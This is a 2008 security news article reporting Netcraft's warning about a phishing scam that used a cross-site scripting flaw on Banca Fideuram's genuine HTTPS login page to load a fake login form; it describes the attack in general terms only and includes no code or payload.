Phishers Exploit XSS Flaw to Operate Banking ScamInternet services company, Netcraft, based in Bath, warns that an 'extremely convincing' phishing scam is exploiting the name of a legitimate Italian banking website, Banca Fideuram, proving how cross-site scripting flaws could make it almost impossible to detect phishing attacks. According to Netcraft, the attack aims at Banca Fideuram to reach users through the typical route of a genuine-looking e-mail in the pretext of asking recipients to log onto the bank's website. The attack is different in that it is executed on the website of the bank itself, while it uses a real SSL certificate that Banca Fideuram has been issued. The e-mail, according to Netcraft, embeds a crafty URL that exploits an XSS or cross-site scripting vulnerability to insert a login form with modifications onto the login page of the bank's site. The fraudsters who have managed to insert an iFrame code onto the banking site's login page use it to load a slightly changed login form from a Taiwan hosted web server. However, the inserted form has a JavaScript that presents Italian text in attempts to get around security filters, the security company noted. Also, the attack appears more convincing to victims by the vector it uses. The URL that the attack employs injects numbers straight to the JavaScript utility that already runs on the LoginServlet page of the bank. This poses difficulty for even an experienced person using the banking site to detect the XSS nature in the attack, as no suspicion arises for the URL, with code injection being only of commas and numbers. According to Paul Mutton, Handler of Netcraft, the attack underlines the seriousness of implications XSS vulnerabilities impose on banking sites. Netcraft published Mutton's statement in the second week of January 2008. Mutton added that the attack shows how display of 'https' in the beginning of a URL address does not guarantee security, neither does a check for the correct domain name on the address bar of the browser. Netcraft said that it has informed the bank about the attack affecting it and has taken down the harmful phishing site to close its access to users. Related article: Phishers Expand Their Sphere of Attacks » SPAMfighter News - 1/24/2008 |
Dear Reader
We are happy to see you are reading our IT Security News.
We do believe, that the foundation for a good work environment starts with fast, secure and high performing computers. If you agree, then you should take a look at our Business Solutions to Spam Filter & Antivirus for even the latest version of Exchange Servers - your colleagues will appreciate it!